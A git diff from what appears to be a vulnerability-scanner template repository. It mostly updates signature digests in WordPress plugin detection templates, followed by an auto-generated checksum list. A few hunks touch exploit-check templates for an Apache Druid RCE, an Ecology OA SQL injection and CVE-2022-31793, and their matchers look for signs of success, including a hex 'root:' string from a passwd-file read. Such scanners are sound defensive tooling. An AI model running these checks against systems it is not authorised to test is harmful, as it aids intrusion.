+47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022011d3c976486d7493de281aac86a4627588ebd0cdfba4756456540be991c8f5aa02204fb65dc757de6652b5cdc36ab280d9cf61fb31836cd4f1f1d0564ba4c08d249f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207ff73cbd34afd407aed64b78683137258a493779a34f45ebcc16e1ebff5a406f02200678ccf374bb55ccf3e2f4b897ab2d8e3d3e530562d9d7c9d139f1bac381ddad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index e3b42b84fe..d02c1a1162 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207c5e5858b207890b0228d7a89f2a17f6ac1767d06e9585320a7af77192546050022100e0aaa667aac4193b9dd7654e583c9687ab2146af4d8c5c91db1bba9f3515474a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f07d2d2773490150c386c4dd4e26a600ee8faa1a1cc9bb1046c1ca598e36852e02205bfd618da359a91ef22cba52fb122e670cd891d80a53443e205b68c8c7a09d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 2c33615b35..63a7d40f59 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202a83c6737f486b9ad1d9dc6335fe9456fb2fe3d1087f68fc7a6e4d5e04aca75c022100ebb8661f0afb174afee02ce9f6b9b723ef9b49008e05cba0c5ba08c847e918ea:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204b5e1bb9da1431df2ed1922ccac1e9909a9935702557700568a2afcea43534fa022100b7723a04a29fa48b4148a9b6bc833b6413de7d29f860981d7b2538bfbf44660d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 9d636b5dbc..608ed15105 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100886be4dfa15df94e108ef44ebe09de9b28cd4449df2ea1fbb503fffe4bfffea702206470c1505407146f82b96436825182be0598f33b5178ae35a523b44c1f3e46a7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c4220462f6ef678d45f38df249cb0662e5ce2b9c356d4ea0ae38d6f80f1fdbd302204347c75865d6b5f3e175bfde418fe223fcd1a5e65ec96a6ef42f546e676ca9e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index baeb8fd1e0..50eb5108f6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f08a3e186608179f3e83a74e92174a0adfd3872dde9411c7c46e1e6c7f9e56f9022074138f98e8d93e3ef97e09be477e056b7db8a3c5313a238c9a0965c2a944088a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100efe8eabe59a2d8af1e12c6cd3eef17079396d3e4ed3b2fbb14fe6f1bd0fa0f42022039dd8f73113e5b0b971e0c035a541c50b40ff10cdfd2eb315087beec25b52a9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 4dee18fdae..b4d1773f4d 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100acb80329b80b23635fab528eedb9059c6f5f3fa8b49c984f998a39fada66cf9f02207541fe14810ee22e1d17645834edeb2f58b663d9fa0aaa0736a000b9e0866e6c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ec46f01e876da7c79925a2aae94500ab62bc5d51fbe8183c296e08614a6d8952022100f86c1f2ffd22c599613bae9c69fe6d20f87f2e7af3d08de25e4d760100d33b1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index b8a6c3eef2..e1e0937ecd 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022001f5c0351ea6d84bfe7e387548e611415b8fe9c3680a2db0f2038a100890be04022100aec80bfef48a9eeeba1349068fbb073fad57a176c4f43ce6059182d568aa3778:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200d7793c01c8ce16ee5874342d2532b32acf6a294060df919f93f8ec93acc1f3e022074768bea270f2d454a29ee2145c61c01030774158089608e2be078fe2ce4fe82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 4116764aa0..983e6dc955 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008fac626f0cc4da1553486998fd2f566dafd5fbdabacd8bf0af030c0d7353df24022063b2af66e7e865bc5ddcba5fdedf20281e250f6fc2a5e2edb89ff14dfab1fe26:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206d966ee2b1b0c8d285ae265f4b7df88d85fae36ef115f74bf95da43484990335022100eeba8f242f3bc0483ee1fa551250b10ca2f24f09ee283d249197db70b09189b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 082c6daaec..72bd81aec0 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210088cf7773435eecca072893286f514bf34597632627cf40251cc068ce21a5a5dc022100a5eb5d2e8db6b0eed675e01dc75857e3541728c7674b2d769631b5402ff23fdb:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220089a351f1f21975918151f12420cb4d02e8a46d90cf07f293f9acbe3fdbd55eb022009570f5058db949bc5abcf066ff0a317dcbd84c65ce46c4bbb1c05eab63cbf05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 2418baf2d2..1f9556eae3 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207f91bbc48ba3b7c1d740dfa82d4e1c9c7ed1eb86eab536d2c154cf374fceec53022100b29913e9da9d59c16af13cccb4f2107be0b167e6a6022c48de4c6bd8097fc347:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202bca533d26f47ae6eefe0bec58326225282cbdb7f4e902ab6dab3d6228f2794602200e19690595a519ed59417a9eb59b5a9f99765da47ec6a35ca034a785ac635c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 594c7b846e..1e68a6ae08 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202749bacd2ec7bdcf93fd1a3822aee25592895d862132688526a88134d408a04502202a1171f6299268d2869d8b495df2d13d6facf9c8541307a212ea40a07e187531:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220483fe9aab178ef54866c422db7f5502ab6f2e8be56e9d693434d586c2e132ac7022039d326f71d11a514e553d60597d2129e4031849dc1db5a8a4a0d6e72bbfb45bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 42fa3bfe85..5b7ba6d826 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c72fef6975b501197533c1f430e0920b1fd920e13154977b3c6cef61c32fd558022100aab61a7e3a97dcfd7f426bc62abedab63a95b0c81b9be920da0f3a51c011058d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022047af8d07bcceeca2273ad255b256d8b32d1ecb97038b934dc66a41de9bbf7cae022100fd030f7bcaed6f93691266501052d4b722bdb13735621b004726eef2d15ab216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index bfb876f65a..64e0272973 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bbba48fa96e082ae02d98b4f923d1426bafc9e29e94cfecf448e3166988d1846022069c391bdf899f85f0279ae717333d688024089c4ccd83abcd49e7e596ac55534:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cdbfaf9f5ba03450231d2dcd06578527fcc78dfcb4e7794a9910b6a514f87fcb022100af1c1df0c9f76e87c12b9b2198b72e12f03c4fa547ebda7e24ad357ca4134be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index c7324621ea..62846ccfd5 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100abeef94dc28fd2b4a8fa7b9d56f3f1a3bfa5244dcd95f0c36f4ffb23b2acde85022100cd1cd5af9f7f356b7c179e74685cb9838acadc7d1546cb5c7f8b8313cba69c65:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220362d0045414482c52bef7469b8aa1dec401bfe52cc2b3affa15dc3be90f1dc1402202547de80b66ac1f7e8e1bee568d42c3de78d7271d9400bb7a2eedff6ba3921d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index bfdff7c7a0..78fa592280 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008052f37309b0f03997fc03bf251de67b5fe0fa90a26a877ab726ec99d5bfcaac022013bedbfd4c475efef3856c8e2431c3424e40f6ecbf921c2db0b1e66bd7da56bf:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100db9069df0e8608e57574de58cc507c1eb0bcf2149770ed308b56371474f69026022100dc3fbddab9061aa61b9c9d142362b2119e52aa6532cbc4cc467302fd9e3eed82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 780d18db4f..21cb75e9cf 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100965e7b85f621e000b4fbb04ad940d2410a9ddd489d6e9ab757ca4dfd50be1e88022100c7927d1da4287b940995e7a91d7624e226648ac6830e57b39741a81c7dbd17d9:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022015edf60643d650fc27b0b48b8e1e0172d4436ad80cdcd2b0b63e96f8333c853c022100bffb414673f9b0672559587d72564ab77941fda5819a753abac652e7a738340d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 18cd309dae..900007b1e8 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e44eba7056a884212d343f5a9da8190f187b5e3c11303c8d204bc142179de1c40221008f57f5bbfe923ffffe4fc6993c8c7cb54ab509506eeaa8b39d04a89e54d07904:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d6996aa3e77d91674a9b370ff3f8a2ea861c0d91ce18ee462bc5528cbd78d066022100eaded7b40a45751d944a07fc550c9b1f8361df8de6ba4b7274df158e5537f93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index acedc263bb..3769dfbbd8 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fd14c6a6c036001cc26dd91fc225a03ba828cd48f13b7178e79bf87d3836bab7022040efeb39ac8b52af882d7e132ad6060cd7bfc02672bd0e93bea308c4e2bcd916:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210085ca2064e09f864eb370e9c682b90ca0939c57f5e733743b06a88ab8bc5c0c94022074d2774ea55c96dd23228d197135d104eb9064e38d66479fca52b2bd05d434c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 07c05140fa..e9272d155d 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f54e47abb854e93ddac15182d301969d94f06638340fd743168e5517daf2eaf402207fe2e5f9b50ddd6cd5b9f147d3350d06fa86f77dd90096724be6fdd67d9e913d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c328a5443d626be698ccf227eb2173bc6fff3fcfd1c7b2881c05c0a8a80bb42a02207482877ca1c246526df6f7ccfe5d859f56253258a2b833866a913c5ed54023aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index 30709f149b..519caee938 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022054ac90fb26aa6f369a58942693dc48f31db219078777954296a7d508fd4e26f0022100ad83bfe2cf4dc9434633cc18f4ee0330c59bafa4290320bef769d2f41a40ed60:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a88bee359e4b945df7657812b39e62c39801b2330c6b404021652696e901fe76022013307ba2feaaba946a31aa46133f2b503e5d0dc64163078b542195e92e8f86fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 276659dfcc..70eb866fb9 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dee5a0855f1ef59945db83b0b5a136d72b1f8c487617f4367e1f054b71db297a02202128246e0cd5a30d9a2340c6a6911e64c38e65864d152711dc7c183b4e619368:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022036de88386fa173cc33056ff9c343d93b3bf269d337f58cec5f2cd3d465c5241f022032766db8582c21fd060186a3cdfcd77ae4c0fd73848c0df4bc8c80b9687669b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ba4fc36453..c05c39602e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008e0ed857afe7606ef34fabf0ffa7fff81b1e99f4f4e0a1ea516bd1ab49a05ca5022100e997a153d46ddff6d35a2391cf090310f86af18a527d62363a24f6746671c76e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201fe0baa15e6fa9708917256914b7d6a558a3ed259cf0cd437cc12d891ee6c21e02203a1efc5aee7f9898c4bab5bc4a8a28a9d7382c43bd68f7db6e087ccd82f8ea75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 24b9fa1e74..d291da8468 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203c88b61d84061aaadbde628ab67e0dc54d95681d61d3f8a98d129d0f8943a36e022100be7e0afbfc9a41ed8c29906472ee387354992cc64192c092d02429a98fad27fb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b97d0b39054efd04a10c7ddfaca5249bc252edacbf63097e632a5954f5202af1022074a8c5f1765ba4630416d412550258d9d8a17927a335444de6fe9b0a3373a583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index c9a450b47f..c7dcf32244 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022008297cf68cb109e905c7b9fefb1da19652baf0d99c42804334b4da139197b9f20220137e5bda1fa9c94eedf48fc8e5a5a3a5391b23db83b6fb5f17d2c4e11fa7d456:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022006798ad818e8ef8188a4b066e0d97ecab34ed0af6f7f1306de9e9dd10035da4d022069c09325e9c56098c5bdeb5c4695d73232ee4ad60477efaf8177fcd080895f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 8b40c9d62a..85d357baba 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022058fbee65c6a1c468646c541a0fa988c2610023923bbd3d075c26a9593446dac902206cbd84316cf6e6bb3140e74b1c61077217f4b11bf5a238f342988ccdf0851fc2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bb5bd231dc66c9069ded62b9ad1085ee0acb43586b8e62b64ff51f9baaef8032022100b973b2424200d410331c003da0fb9781ed953074bf578b56105f1904b28472f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index dfeb4df0e4..0cf2d5ba34 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202668b69b39777fed3d1f72691e1c988e1bce096c70300bf5c338127cad198a9d022100a0a749d5c49dabdb2f0faee24685ea86321cf8b1ba2cdb9d03cc3d8d69220f09:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b78e965ac3cf4229008e77653d52d21ab94309f3e1fddf76dcaa1d5c4e34d562022100a82fcd5ff90dc6f7e165bdc168a11f077f32a6ccca1c66e2625ea4f55fb78502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml index 089694aca5..205d90f375 100644 --- a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml +++ b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml @@ -96,5 +96,4 @@ http: - type: status status: - 400 - -# digest: 4b0a00483046022100bbdda0103c2864f357ebbc5a4097dfc21c93fc13714ea4fbc67de0eab9ca1134022100fd157d6d28b4cbce7f4bc7949f7f5949e58a20dad9df94870fc10172e5c0aa9b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205259d3c33461a120e41e6ec42d3fcb65f5d8e41cdfa2ae0585c8d225f7e7219402202ce3b3f41ce01168327495d05036a63a1b1b345d904ef9585a44a161d2929f2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml index bf41fe2b43..cd90b9ae9a 100644 --- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml +++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml @@ -39,4 +39,4 @@ http: - 'duration_2>=15 && status_code_2 == 200' - 'contains(header_2, "ecology_JSessionid=")' condition: and -# digest: 4a0a004730450220596edd2349df4768ede6899a51ac91ab751b3f9a1f0a6387c328ab0a4d371d91022100dfc4ae8081c42434d2872c3dcd68aa37d6bc8167d7e9619d815446d5532fc704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ffe0b0bbdd67b8d72070bd4b0ebcbd93eaed08be7e825664b654c76340c93303022100d0dda143a17d2ccd9570880ebb09784be05f7e5862ad9ed5b60ea6ea2c7e9a15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index 3503da1a4e..f2531630d0 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -42,5 +42,4 @@ tcp: encoding: hex words: - "726f6f743a" - -# digest: 490a0046304402200aca7b252e0a1bd817c6c9b9b3dc1546d5756affe274c7f923919dec125b5d7602205a5c89a20e3eee64c2367a6003cd42b7faf11e0428e25d1c1c40f2fedcf9d888:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203acf23780ef9e7085a49cb9dd68fe95e794ba4d263b14e694722d78ff538b8ed02205ff5d145077a68655bc0db1f582fcb3ce5b8d13e641e6b27e820e669df53e9ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 57615ae6aa5a395758923844bf1bd16bb0fa6d33 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 15:42:53 +0000 Subject: [PATCH 31/36] Auto Generated Templates Checksum [Fri Nov 3 15:42:53 UTC 2023] :robot: --- templates-checksum.txt | 4328 ++++++++++++++++++++-------------------- 1 file changed, 2164 insertions(+), 2164 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 68fc8d6072..dd5312953c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -628,2200 +628,2200 @@ http/credential-stuffing/cloud/pulmi-login-check.yaml:b360401b724799237fbd4b0b00 http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:a74d469cb194be475eaea82cfe2dc753efe638fb http/credential-stuffing/self-hosted/grafana-login-check.yaml:8f5793e273b313b8fdc6ef9a28efef7786fe4802 http/credential-stuffing/self-hosted/jira-login-check.yaml:cccab91229b3c826d50f35b9d6b3a52755417602 -http/cves/2000/CVE-2000-0114.yaml:bfb2c3d026d7699a2e8a3a3e0b0b57ed2cd46a11 -http/cves/2001/CVE-2001-0537.yaml:4bbf6cc03d470256807d695af2a89cdc4633e0b5 -http/cves/2002/CVE-2002-1131.yaml:01a386c963acfcdc1770e2a55a3c8cb27b66ceab -http/cves/2004/CVE-2004-0519.yaml:f4cda6d6a5f53ff6ef5a61b5190e0bc7bdf0edb9 -http/cves/2004/CVE-2004-1965.yaml:6a505177df3dba34fb4ab73be878c991a9314310 -http/cves/2005/CVE-2005-2428.yaml:fcad2910a1f02c09ddf69693af3beeb90e451d3c -http/cves/2005/CVE-2005-3344.yaml:9496add62684b558a3c8ff84d11365261e8fd206 -http/cves/2005/CVE-2005-3634.yaml:b65e2dd47414c93238237f525a3686a3e7b32c08 -http/cves/2005/CVE-2005-4385.yaml:3c98650ca47913b5f24ffef30846c82dd67dd20b -http/cves/2006/CVE-2006-1681.yaml:fff07a2d29835e6a4d3fa21476a89afa9455def1 -http/cves/2006/CVE-2006-2842.yaml:5c9a7032c38f58a43b4d604479227a105a47454c -http/cves/2007/CVE-2007-0885.yaml:5b640a4771cf9e579a37f8e669ddb0c33991cb92 -http/cves/2007/CVE-2007-4504.yaml:16d976a5f5dfc675c87fec1ca1e5361b61f041d6 -http/cves/2007/CVE-2007-4556.yaml:56f654211b62cb2726017867c0a18c85aadc5354 -http/cves/2007/CVE-2007-5728.yaml:b48556b35ed976c27197378f668436b8c491a6e0 -http/cves/2008/CVE-2008-1059.yaml:546955f4e073dc0d65cec49c98df5d7becc34ff2 -http/cves/2008/CVE-2008-1061.yaml:7bef4a2f7f5863a72c35b419ac64d06b4d178429 -http/cves/2008/CVE-2008-1547.yaml:10aa5c0a03cd21d740b403005655593d4f9efe30 -http/cves/2008/CVE-2008-2398.yaml:48c4e9f50eaac21b2e7ae4663261a56e2e61ca7e -http/cves/2008/CVE-2008-2650.yaml:0424d322bbada8805b81d6ad3f84b37032a8bb2c -http/cves/2008/CVE-2008-4668.yaml:affab51aaed5f6a49b80c39faa2838f8999071f8 -http/cves/2008/CVE-2008-4764.yaml:e04631ec326b5f2d0ac712655ec9711f9962e0ee -http/cves/2008/CVE-2008-5587.yaml:8b20ce29ed86f9d955fb90e51395c07a30ba67bf -http/cves/2008/CVE-2008-6080.yaml:8f67169071c324c3c6bdb2ec63646b82bec16b89 -http/cves/2008/CVE-2008-6172.yaml:9cf3f043f1b938318ebd051e461cc33b65aa6cc1 -http/cves/2008/CVE-2008-6222.yaml:37f2986ea203a35d62fe519af9a367749978b457 -http/cves/2008/CVE-2008-6465.yaml:044b9d6ecd8649738d3c3be2f1293fb177f81a08 -http/cves/2008/CVE-2008-6668.yaml:557ee51dcd689b2d5e9598fdcc6c4a2b9da92709 -http/cves/2008/CVE-2008-6982.yaml:94e602bb0038ddab2894789e1f9c200271110f95 -http/cves/2008/CVE-2008-7269.yaml:f64677496ad1e7993164bed583cbe77bd67cb700 -http/cves/2009/CVE-2009-0347.yaml:ca428fe504c7f1ccc6f29879bcf2ab39e9e8e564 +http/cves/2000/CVE-2000-0114.yaml:29e842ed27be23dfdff4429c99e0f5c94bc79639 +http/cves/2001/CVE-2001-0537.yaml:54768eb1a8f9b2ceaab29324f0dd73a1bed563f1 +http/cves/2002/CVE-2002-1131.yaml:9c0b37e13418c5cf7e3cdcd76e598deb0c69fe4c +http/cves/2004/CVE-2004-0519.yaml:8b7487fa41d7f8afa417a836e8fbd0959f6ecab4 